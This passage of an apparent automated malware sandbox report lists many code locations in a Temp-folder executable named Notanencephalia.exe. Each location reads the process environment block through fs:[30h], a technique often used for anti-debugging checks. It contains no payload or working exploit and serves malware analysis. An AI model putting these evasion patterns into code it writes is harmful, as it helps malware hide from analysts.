      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD73C84 mov eax, dword ptr fs:[00000030h]14_2_1FD73C84
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD73C84 mov eax, dword ptr fs:[00000030h]14_2_1FD73C84
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD73C84 mov eax, dword ptr fs:[00000030h]14_2_1FD73C84
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6DCA0 mov eax, dword ptr fs:[00000030h]14_2_1FD6DCA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9FCA0 mov ecx, dword ptr fs:[00000030h]14_2_1FD9FCA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9FCA0 mov eax, dword ptr fs:[00000030h]14_2_1FD9FCA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9FCA0 mov eax, dword ptr fs:[00000030h]14_2_1FD9FCA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9FCA0 mov eax, dword ptr fs:[00000030h]14_2_1FD9FCA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9FCA0 mov eax, dword ptr fs:[00000030h]14_2_1FD9FCA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDABCA0 mov eax, dword ptr fs:[00000030h]14_2_1FDABCA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDABCA0 mov eax, dword ptr fs:[00000030h]14_2_1FDABCA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDABCA0 mov ecx, dword ptr fs:[00000030h]14_2_1FDABCA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDABCA0 mov eax, dword ptr fs:[00000030h]14_2_1FDABCA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD67C40 mov eax, dword ptr fs:[00000030h]14_2_1FD67C40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD67C40 mov ecx, dword ptr fs:[00000030h]14_2_1FD67C40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD67C40 mov eax, dword ptr fs:[00000030h]14_2_1FD67C40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD67C40 mov eax, dword ptr fs:[00000030h]14_2_1FD67C40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA1C7C mov eax, dword ptr fs:[00000030h]14_2_1FDA1C7C
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2FC4F mov eax, dword ptr fs:[00000030h]14_2_1FE2FC4F
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD81C60 mov eax, dword ptr fs:[00000030h]14_2_1FD81C60
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE3DC27 mov eax, dword ptr fs:[00000030h]14_2_1FE3DC27
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE3DC27 mov eax, dword ptr fs:[00000030h]14_2_1FE3DC27
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE3DC27 mov eax, dword ptr fs:[00000030h]14_2_1FE3DC27
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDFBC10 mov eax, dword ptr fs:[00000030h]14_2_1FDFBC10
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDFBC10 mov eax, dword ptr fs:[00000030h]14_2_1FDFBC10
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDFBC10 mov ecx, dword ptr fs:[00000030h]14_2_1FDFBC10
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE41C3C mov eax, dword ptr fs:[00000030h]14_2_1FE41C3C
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDABC3B mov esi, dword ptr fs:[00000030h]14_2_1FDABC3B
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE4BC01 mov eax, dword ptr fs:[00000030h]14_2_1FE4BC01
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE4BC01 mov eax, dword ptr fs:[00000030h]14_2_1FE4BC01
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDF9C32 mov eax, dword ptr fs:[00000030h]14_2_1FDF9C32
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDFFBDC mov eax, dword ptr fs:[00000030h]14_2_1FDFFBDC
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDFFBDC mov eax, dword ptr fs:[00000030h]14_2_1FDFFBDC
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDFFBDC mov eax, dword ptr fs:[00000030h]14_2_1FDFFBDC
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83BD6 mov eax, dword ptr fs:[00000030h]14_2_1FD83BD6
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83BD6 mov eax, dword ptr fs:[00000030h]14_2_1FD83BD6
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83BD6 mov eax, dword ptr fs:[00000030h]14_2_1FD83BD6
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83BD6 mov eax, dword ptr fs:[00000030h]14_2_1FD83BD6
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83BD6 mov eax, dword ptr fs:[00000030h]14_2_1FD83BD6
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2FBF3 mov eax, dword ptr fs:[00000030h]14_2_1FE2FBF3
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD79BC4 mov eax, dword ptr fs:[00000030h]14_2_1FD79BC4
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD67BCD mov eax, dword ptr fs:[00000030h]14_2_1FD67BCD
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD67BCD mov ecx, dword ptr fs:[00000030h]14_2_1FD67BCD
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB1BEF mov eax, dword ptr fs:[00000030h]14_2_1FDB1BEF
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB1BEF mov eax, dword ptr fs:[00000030h]14_2_1FDB1BEF
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA9B9F mov eax, dword ptr fs:[00000030h]14_2_1FDA9B9F
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA9B9F mov eax, dword ptr fs:[00000030h]14_2_1FDA9B9F
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA9B9F mov eax, dword ptr fs:[00000030h]14_2_1FDA9B9F
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE43B80 mov eax, dword ptr fs:[00000030h]14_2_1FE43B80
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE43B80 mov eax, dword ptr fs:[00000030h]14_2_1FE43B80
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE43B80 mov eax, dword ptr fs:[00000030h]14_2_1FE43B80
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE39B8B mov eax, dword ptr fs:[00000030h]14_2_1FE39B8B
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE39B8B mov eax, dword ptr fs:[00000030h]14_2_1FE39B8B
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2FB97 mov eax, dword ptr fs:[00000030h]14_2_1FE2FB97
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9DBA0 mov eax, dword ptr fs:[00000030h]14_2_1FD9DBA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9DBA0 mov eax, dword ptr fs:[00000030h]14_2_1FD9DBA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9DBA0 mov eax, dword ptr fs:[00000030h]14_2_1FD9DBA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9DBA0 mov eax, dword ptr fs:[00000030h]14_2_1FD9DBA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9DBA0 mov eax, dword ptr fs:[00000030h]14_2_1FD9DBA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9DBA0 mov eax, dword ptr fs:[00000030h]14_2_1FD9DBA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE13B60 mov eax, dword ptr fs:[00000030h]14_2_1FE13B60
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE13B60 mov eax, dword ptr fs:[00000030h]14_2_1FE13B60
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE13B60 mov eax, dword ptr fs:[00000030h]14_2_1FE13B60
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE13B60 mov eax, dword ptr fs:[00000030h]14_2_1FE13B60
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE13B60 mov eax, dword ptr fs:[00000030h]14_2_1FE13B60
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6FB4C mov edi, dword ptr fs:[00000030h]14_2_1FD6FB4C
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE05B50 mov eax, dword ptr fs:[00000030h]14_2_1FE05B50
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE05B50 mov eax, dword ptr fs:[00000030h]14_2_1FE05B50
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD71B04 mov eax, dword ptr fs:[00000030h]14_2_1FD71B04
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD71B04 mov eax, dword ptr fs:[00000030h]14_2_1FD71B04
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9DB00 mov eax, dword ptr fs:[00000030h]14_2_1FD9DB00
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9DB00 mov eax, dword ptr fs:[00000030h]14_2_1FD9DB00
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9DB00 mov eax, dword ptr fs:[00000030h]14_2_1FD9DB00
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9DB00 mov eax, dword ptr fs:[00000030h]14_2_1FD9DB00
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9DB00 mov eax, dword ptr fs:[00000030h]14_2_1FD9DB00
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9DB00 mov edx, dword ptr fs:[00000030h]14_2_1FD9DB00
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2FB0C mov eax, dword ptr fs:[00000030h]14_2_1FE2FB0C
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA9B28 mov eax, dword ptr fs:[00000030h]14_2_1FDA9B28
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA9B28 mov eax, dword ptr fs:[00000030h]14_2_1FDA9B28
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE43B10 mov eax, dword ptr fs:[00000030h]14_2_1FE43B10
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9BADA mov eax, dword ptr fs:[00000030h]14_2_1FD9BADA
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDF1ACB mov eax, dword ptr fs:[00000030h]14_2_1FDF1ACB
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDF1ACB mov ecx, dword ptr fs:[00000030h]14_2_1FDF1ACB
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE05AD0 mov eax, dword ptr fs:[00000030h]14_2_1FE05AD0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6BAE0 mov eax, dword ptr fs:[00000030h]14_2_1FD6BAE0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE21AA3 mov eax, dword ptr fs:[00000030h]14_2_1FE21AA3
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE21AA3 mov eax, dword ptr fs:[00000030h]14_2_1FE21AA3
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE21AA3 mov eax, dword ptr fs:[00000030h]14_2_1FE21AA3
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1DAAC mov ecx, dword ptr fs:[00000030h]14_2_1FE1DAAC
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1DAAC mov ecx, dword ptr fs:[00000030h]14_2_1FE1DAAC
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1DAAC mov eax, dword ptr fs:[00000030h]14_2_1FE1DAAC
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD67A80 mov eax, dword ptr fs:[00000030h]14_2_1FD67A80
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD67A80 mov eax, dword ptr fs:[00000030h]14_2_1FD67A80
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD67A80 mov eax, dword ptr fs:[00000030h]14_2_1FD67A80
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2FA87 mov eax, dword ptr fs:[00000030h]14_2_1FE2FA87
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6FAA4 mov ecx, dword ptr fs:[00000030h]14_2_1FD6FAA4
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9DAAE mov eax, dword ptr fs:[00000030h]14_2_1FD9DAAE
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7BAA0 mov eax, dword ptr fs:[00000030h]14_2_1FD7BAA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7BAA0 mov eax, dword ptr fs:[00000030h]14_2_1FD7BAA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD69A40 mov ecx, dword ptr fs:[00000030h]14_2_1FD69A40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE03A78 mov eax, dword ptr fs:[00000030h]14_2_1FE03A78
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE03A78 mov eax, dword ptr fs:[00000030h]14_2_1FE03A78
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE03A78 mov eax, dword ptr fs:[00000030h]14_2_1FE03A78
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE03A78 mov eax, dword ptr fs:[00000030h]14_2_1FE03A78
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE03A78 mov eax, dword ptr fs:[00000030h]14_2_1FE03A78
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE03A78 mov eax, dword ptr fs:[00000030h]14_2_1FE03A78
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD99A18 mov ecx, dword ptr fs:[00000030h]14_2_1FD99A18
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDEDA1D mov eax, dword ptr fs:[00000030h]14_2_1FDEDA1D
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6BA10 mov eax, dword ptr fs:[00000030h]14_2_1FD6BA10
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA5A01 mov eax, dword ptr fs:[00000030h]14_2_1FDA5A01
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA5A01 mov ecx, dword ptr fs:[00000030h]14_2_1FDA5A01
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA5A01 mov eax, dword ptr fs:[00000030h]14_2_1FDA5A01
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA5A01 mov eax, dword ptr fs:[00000030h]14_2_1FDA5A01
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2FA02 mov eax, dword ptr fs:[00000030h]14_2_1FE2FA02
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7BA30 mov eax, dword ptr fs:[00000030h]14_2_1FD7BA30
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7BA30 mov ecx, dword ptr fs:[00000030h]14_2_1FD7BA30
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7BA30 mov eax, dword ptr fs:[00000030h]14_2_1FD7BA30
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7BA30 mov eax, dword ptr fs:[00000030h]14_2_1FD7BA30
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7BA30 mov eax, dword ptr fs:[00000030h]14_2_1FD7BA30
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7BA30 mov eax, dword ptr fs:[00000030h]14_2_1FD7BA30
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1BA0B mov eax, dword ptr fs:[00000030h]14_2_1FE1BA0B
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1BA0B mov eax, dword ptr fs:[00000030h]14_2_1FE1BA0B
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1BA0B mov eax, dword ptr fs:[00000030h]14_2_1FE1BA0B
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1BA0B mov eax, dword ptr fs:[00000030h]14_2_1FE1BA0B
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE17A11 mov edi, dword ptr fs:[00000030h]14_2_1FE17A11
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9DA20 mov eax, dword ptr fs:[00000030h]14_2_1FD9DA20
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9DA20 mov eax, dword ptr fs:[00000030h]14_2_1FD9DA20
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9D9D0 mov eax, dword ptr fs:[00000030h]14_2_1FD9D9D0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9D9D0 mov eax, dword ptr fs:[00000030h]14_2_1FD9D9D0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9D9D0 mov esi, dword ptr fs:[00000030h]14_2_1FD9D9D0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9D9D0 mov eax, dword ptr fs:[00000030h]14_2_1FD9D9D0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9D9D0 mov eax, dword ptr fs:[00000030h]14_2_1FD9D9D0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9D9D0 mov eax, dword ptr fs:[00000030h]14_2_1FD9D9D0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9D9D0 mov eax, dword ptr fs:[00000030h]14_2_1FD9D9D0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9D9D0 mov eax, dword ptr fs:[00000030h]14_2_1FD9D9D0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2B9EE mov eax, dword ptr fs:[00000030h]14_2_1FE2B9EE
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2B9EE mov ecx, dword ptr fs:[00000030h]14_2_1FE2B9EE
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2B9EE mov eax, dword ptr fs:[00000030h]14_2_1FE2B9EE
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD759C0 mov eax, dword ptr fs:[00000030h]14_2_1FD759C0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD759C0 mov eax, dword ptr fs:[00000030h]14_2_1FD759C0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD759C0 mov eax, dword ptr fs:[00000030h]14_2_1FD759C0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD759C0 mov eax, dword ptr fs:[00000030h]14_2_1FD759C0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDF19EE mov eax, dword ptr fs:[00000030h]14_2_1FDF19EE
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDF19EE mov eax, dword ptr fs:[00000030h]14_2_1FDF19EE
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDF19EE mov eax, dword ptr fs:[00000030h]14_2_1FDF19EE
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE4B9DF mov eax, dword ptr fs:[00000030h]14_2_1FE4B9DF
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE4B9DF mov eax, dword ptr fs:[00000030h]14_2_1FE4B9DF
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6B991 mov eax, dword ptr fs:[00000030h]14_2_1FD6B991
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6B991 mov eax, dword ptr fs:[00000030h]14_2_1FD6B991
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE479BC mov eax, dword ptr fs:[00000030h]14_2_1FE479BC
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE479BC mov ecx, dword ptr fs:[00000030h]14_2_1FE479BC
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE479BC mov eax, dword ptr fs:[00000030h]14_2_1FE479BC
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDF9983 mov eax, dword ptr fs:[00000030h]14_2_1FDF9983
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD799BE mov eax, dword ptr fs:[00000030h]14_2_1FD799BE
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2598D mov eax, dword ptr fs:[00000030h]14_2_1FE2598D
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2598D mov eax, dword ptr fs:[00000030h]14_2_1FE2598D
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2598D mov eax, dword ptr fs:[00000030h]14_2_1FE2598D
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1F99B mov eax, dword ptr fs:[00000030h]14_2_1FE1F99B
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1F99B mov eax, dword ptr fs:[00000030h]14_2_1FE1F99B
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1F99B mov eax, dword ptr fs:[00000030h]14_2_1FE1F99B
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1F99B mov eax, dword ptr fs:[00000030h]14_2_1FE1F99B
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1F99B mov eax, dword ptr fs:[00000030h]14_2_1FE1F99B
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1F99B mov eax, dword ptr fs:[00000030h]14_2_1FE1F99B
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1F99B mov ecx, dword ptr fs:[00000030h]14_2_1FE1F99B
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1F99B mov ecx, dword ptr fs:[00000030h]14_2_1FE1F99B
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1F99B mov eax, dword ptr fs:[00000030h]14_2_1FE1F99B
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1F99B mov eax, dword ptr fs:[00000030h]14_2_1FE1F99B
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1F99B mov eax, dword ptr fs:[00000030h]14_2_1FE1F99B
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1F99B mov eax, dword ptr fs:[00000030h]14_2_1FE1F99B
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1F99B mov eax, dword ptr fs:[00000030h]14_2_1FE1F99B
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7F950 mov eax, dword ptr fs:[00000030h]14_2_1FD7F950
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7F950 mov eax, dword ptr fs:[00000030h]14_2_1FD7F950
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD89950 mov eax, dword ptr fs:[00000030h]14_2_1FD89950
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD89950 mov eax, dword ptr fs:[00000030h]14_2_1FD89950
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDFB953 mov eax, dword ptr fs:[00000030h]14_2_1FDFB953
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2F97D mov eax, dword ptr fs:[00000030h]14_2_1FE2F97D
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9D978 mov eax, dword ptr fs:[00000030h]14_2_1FD9D978
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDAB970 mov eax, dword ptr fs:[00000030h]14_2_1FDAB970
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDAB970 mov eax, dword ptr fs:[00000030h]14_2_1FDAB970
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDAB970 mov eax, dword ptr fs:[00000030h]14_2_1FDAB970
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD67967 mov eax, dword ptr fs:[00000030h]14_2_1FD67967
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA196E mov eax, dword ptr fs:[00000030h]14_2_1FDA196E
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA196E mov eax, dword ptr fs:[00000030h]14_2_1FDA196E
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD97962 mov eax, dword ptr fs:[00000030h]14_2_1FD97962
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDF5960 mov eax, dword ptr fs:[00000030h]14_2_1FDF5960
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9B919 mov eax, dword ptr fs:[00000030h]14_2_1FD9B919
